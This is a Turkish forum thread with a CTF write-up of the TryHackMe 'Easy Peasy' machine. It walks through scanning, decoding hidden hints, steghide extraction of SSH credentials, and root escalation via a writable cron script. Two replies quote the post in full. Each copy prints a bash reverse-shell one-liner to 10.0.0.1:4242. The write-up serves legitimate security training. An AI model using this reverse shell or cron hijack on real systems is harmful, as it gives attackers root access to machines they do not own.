TryHackMe | Easy Peasy Write-Up

LOEN

Katılımcı Üye
24 Mar 2022
408
504
offset


Herkese merhaba

Bu konuda TryHackMe CTF platformasinda yer alan Easy Peasy isimli makinenin cozumunu anlaticam.

Makine Linki
Zorluk Derecesi: Easy
Task Sayisi: 2 (her taskda subtasklar bulunuyor)

Not: Sorulari cevaplamakla degilde makine cozumune odaklanicaz.

Ilk once nmap taramasi ile baslayalim.

qd16agk.png


2 tane http 1 tane ssh portu acik durumda
80 portundan yola cikarak enumeration yapalim

tiuurtw.png


Standart nginx sayfasi karsiladi kaynak koda baktigimizda hint olmadigini gorup devam ediyoruz
directory kesfine odaklanalim.

evkfls9.png


pid9mxr.png


"hidden" isimli gizli bir dizin buldu.
bir fotografla karsilastik source kode baktigimizda yine hint olmadigini gorduk
bu biraz suphelendirici olduguna gore bu dizini de taramakta fayda oldugunu dusunuyorsunuz.

6ui4713.png


Dizin icinde bir tane dizin buldu. icerisine baktigimizda yine alakasiz bir fotografla karsilastik
amma source code baktigimizda bize base64 ile decode etmek icin bir ipucu veriyor.

ais6gl1.png


Ilk flagimmizi aldik. Burada bir isimiz kalmadigina gore 2ci http portundan devam edelim.
robots.txtde bir tane flag bulunuyor md5 ile sifrelenmis.Bunu google'da aratirsaniz sonucu karsiniza cikarir.


ru5su6u.png


Sayfaya geldigimizde default apache sayfasi ile karsilastik.
Sayfa kaynagini inceledikte bir tane gizli metin ve bir tane de flag bulduk.
Onceligimiz gizli metin flag sadece ispat icin o yuzden tek tek resim koymayacagim.


Burada bir tahmin yuruterek base serisinden bir tanesi ile sifrelendigini dusundum ve tek
tek deneyerek base62 oldgunu buldum. Site onerisi olacak cyberchef tavsiyemdir.

tqtqiup.png


"/" isaretinden anladik ki bu bir dizin.
Dizin icerisinde bakalim.

ktvucc9.png


Gerek sayfanin on gorunmesinde gerekse de sayfa kaynagina baktikta md5 ile sifrelenmis bir metin goruyoruz.
Googleda aratinca

gk9vrfd.png


Boyle bir password karsimiza cikardi. Elimizde bir user olmadigina gore bu bir user sifresi degildir.
Acaba ne olur diye dusundugumuzde az onceki sayfadaki resim icine bir sey sakli ve parolasida bu diye tahmin
ede biliyoruz.

Steghide ile index.jpg icini actigimzida bize bir txt dosyasi cikariyor.

tqeb5kg.png


Bir tane username bir tane de binary sifre verdi. Online converterler ile sifreyi cevirdigimizde
bize bir ssh credentials verdi.

Simdi ssh baglanip yolumuza son asama olarak privilege escalation ile devam edelim.

t0kvyo0.png


Boring userindeyiz ve crontablara baktigimizda karsimiza bir bash dosyasi cikiyor
Bunu icerigine bakalim.

gg78dfl.png


Bos bir dosya halinde ama root yetkisinde calistigi gorunmekteydi.
O yuzden icerigini degisirip ve netcat ile dinlemeye alip bekleyelim.

p865vx7.png


Bash:
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

105g0k7.png


Baglantimiz geldi ve artik root yani sistemde en yetkiliyiz.



Yararli Siteler:
CyberChef
Ultimate Hashing and Anonymity toolkit
Decrypt MD5, SHA1, MySQL, NTLM, SHA256, SHA512, Wordpress, Bcrypt hashes for free online


 

'GHOST

Uzman üye
31 Mar 2022
1,387
568


Herkese merhaba

Bu konuda TryHackMe CTF platformasinda yer alan Easy Peasy isimli makinenin cozumunu anlaticam.

Makine Linki
Zorluk Derecesi: Easy
Task Sayisi: 2 (her taskda subtasklar bulunuyor)

Not: Sorulari cevaplamakla degilde makine cozumune odaklanicaz.

Ilk once nmap taramasi ile baslayalim.


qd16agk.png


2 tane http 1 tane ssh portu acik durumda
80 portundan yola cikarak enumeration yapalim


tiuurtw.png


Standart nginx sayfasi karsiladi kaynak koda baktigimizda hint olmadigini gorup devam ediyoruz
directory kesfine odaklanalim.


evkfls9.png


pid9mxr.png


"hidden" isimli gizli bir dizin buldu.
bir fotografla karsilastik source kode baktigimizda yine hint olmadigini gorduk
bu biraz suphelendirici olduguna gore bu dizini de taramakta fayda oldugunu dusunuyorsunuz.


6ui4713.png


Dizin icinde bir tane dizin buldu. icerisine baktigimizda yine alakasiz bir fotografla karsilastik
amma source code baktigimizda bize base64 ile decode etmek icin bir ipucu veriyor.


ais6gl1.png


Ilk flagimmizi aldik. Burada bir isimiz kalmadigina gore 2ci http portundan devam edelim.
robots.txtde bir tane flag bulunuyor md5 ile sifrelenmis.Bunu google'da aratirsaniz sonucu karsiniza cikarir.


ru5su6u.png


Sayfaya geldigimizde default apache sayfasi ile karsilastik.
Sayfa kaynagini inceledikte bir tane gizli metin ve bir tane de flag bulduk.
Onceligimiz gizli metin flag sadece ispat icin o yuzden tek tek resim koymayacagim.


Burada bir tahmin yuruterek base serisinden bir tanesi ile sifrelendigini dusundum ve tek
tek deneyerek base62 oldgunu buldum. Site onerisi olacak cyberchef tavsiyemdir.


tqtqiup.png


"/" isaretinden anladik ki bu bir dizin.
Dizin icerisinde bakalim.


ktvucc9.png


Gerek sayfanin on gorunmesinde gerekse de sayfa kaynagina baktikta md5 ile sifrelenmis bir metin goruyoruz.
Googleda aratinca


gk9vrfd.png


Boyle bir password karsimiza cikardi. Elimizde bir user olmadigina gore bu bir user sifresi degildir.
Acaba ne olur diye dusundugumuzde az onceki sayfadaki resim icine bir sey sakli ve parolasida bu diye tahmin
ede biliyoruz.

Steghide ile index.jpg icini actigimzida bize bir txt dosyasi cikariyor.


tqeb5kg.png


Bir tane username bir tane de binary sifre verdi. Online converterler ile sifreyi cevirdigimizde
bize bir ssh credentials verdi.

Simdi ssh baglanip yolumuza son asama olarak privilege escalation ile devam edelim.


t0kvyo0.png


Boring userindeyiz ve crontablara baktigimizda karsimiza bir bash dosyasi cikiyor
Bunu icerigine bakalim.


gg78dfl.png


Bos bir dosya halinde ama root yetkisinde calistigi gorunmekteydi.
O yuzden icerigini degisirip ve netcat ile dinlemeye alip bekleyelim.


p865vx7.png


Bash:
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

105g0k7.png


Baglantimiz geldi ve artik root yani sistemde en yetkiliyiz.



Yararli Siteler:
CyberChef
Ultimate Hashing and Anonymity toolkit
Decrypt MD5, SHA1, MySQL, NTLM, SHA256, SHA512, Wordpress, Bcrypt hashes for free online
Eline sağlık.
 

Speedy Gonzales

Katılımcı Üye
12 Kas 2021
634
296
in every technology system


Herkese merhaba

Bu konuda TryHackMe CTF platformasinda yer alan Easy Peasy isimli makinenin cozumunu anlaticam.

Makine Linki
Zorluk Derecesi: Easy
Task Sayisi: 2 (her taskda subtasklar bulunuyor)

Not: Sorulari cevaplamakla degilde makine cozumune odaklanicaz.

Ilk once nmap taramasi ile baslayalim.


qd16agk.png


2 tane http 1 tane ssh portu acik durumda
80 portundan yola cikarak enumeration yapalim


tiuurtw.png


Standart nginx sayfasi karsiladi kaynak koda baktigimizda hint olmadigini gorup devam ediyoruz
directory kesfine odaklanalim.


evkfls9.png


pid9mxr.png


"hidden" isimli gizli bir dizin buldu.
bir fotografla karsilastik source kode baktigimizda yine hint olmadigini gorduk
bu biraz suphelendirici olduguna gore bu dizini de taramakta fayda oldugunu dusunuyorsunuz.


6ui4713.png


Dizin icinde bir tane dizin buldu. icerisine baktigimizda yine alakasiz bir fotografla karsilastik
amma source code baktigimizda bize base64 ile decode etmek icin bir ipucu veriyor.


ais6gl1.png


Ilk flagimmizi aldik. Burada bir isimiz kalmadigina gore 2ci http portundan devam edelim.
robots.txtde bir tane flag bulunuyor md5 ile sifrelenmis.Bunu google'da aratirsaniz sonucu karsiniza cikarir.


ru5su6u.png


Sayfaya geldigimizde default apache sayfasi ile karsilastik.
Sayfa kaynagini inceledikte bir tane gizli metin ve bir tane de flag bulduk.
Onceligimiz gizli metin flag sadece ispat icin o yuzden tek tek resim koymayacagim.


Burada bir tahmin yuruterek base serisinden bir tanesi ile sifrelendigini dusundum ve tek
tek deneyerek base62 oldgunu buldum. Site onerisi olacak cyberchef tavsiyemdir.


tqtqiup.png


"/" isaretinden anladik ki bu bir dizin.
Dizin icerisinde bakalim.


ktvucc9.png


Gerek sayfanin on gorunmesinde gerekse de sayfa kaynagina baktikta md5 ile sifrelenmis bir metin goruyoruz.
Googleda aratinca


gk9vrfd.png


Boyle bir password karsimiza cikardi. Elimizde bir user olmadigina gore bu bir user sifresi degildir.
Acaba ne olur diye dusundugumuzde az onceki sayfadaki resim icine bir sey sakli ve parolasida bu diye tahmin
ede biliyoruz.

Steghide ile index.jpg icini actigimzida bize bir txt dosyasi cikariyor.


tqeb5kg.png


Bir tane username bir tane de binary sifre verdi. Online converterler ile sifreyi cevirdigimizde
bize bir ssh credentials verdi.

Simdi ssh baglanip yolumuza son asama olarak privilege escalation ile devam edelim.


t0kvyo0.png


Boring userindeyiz ve crontablara baktigimizda karsimiza bir bash dosyasi cikiyor
Bunu icerigine bakalim.


gg78dfl.png


Bos bir dosya halinde ama root yetkisinde calistigi gorunmekteydi.
O yuzden icerigini degisirip ve netcat ile dinlemeye alip bekleyelim.


p865vx7.png


Bash:
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

105g0k7.png


Baglantimiz geldi ve artik root yani sistemde en yetkiliyiz.



Yararli Siteler:
CyberChef
Ultimate Hashing and Anonymity toolkit
Decrypt MD5, SHA1, MySQL, NTLM, SHA256, SHA512, Wordpress, Bcrypt hashes for free online
Dostum eline saglik yararli siteler demisinya ne ise yariyor onlar
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.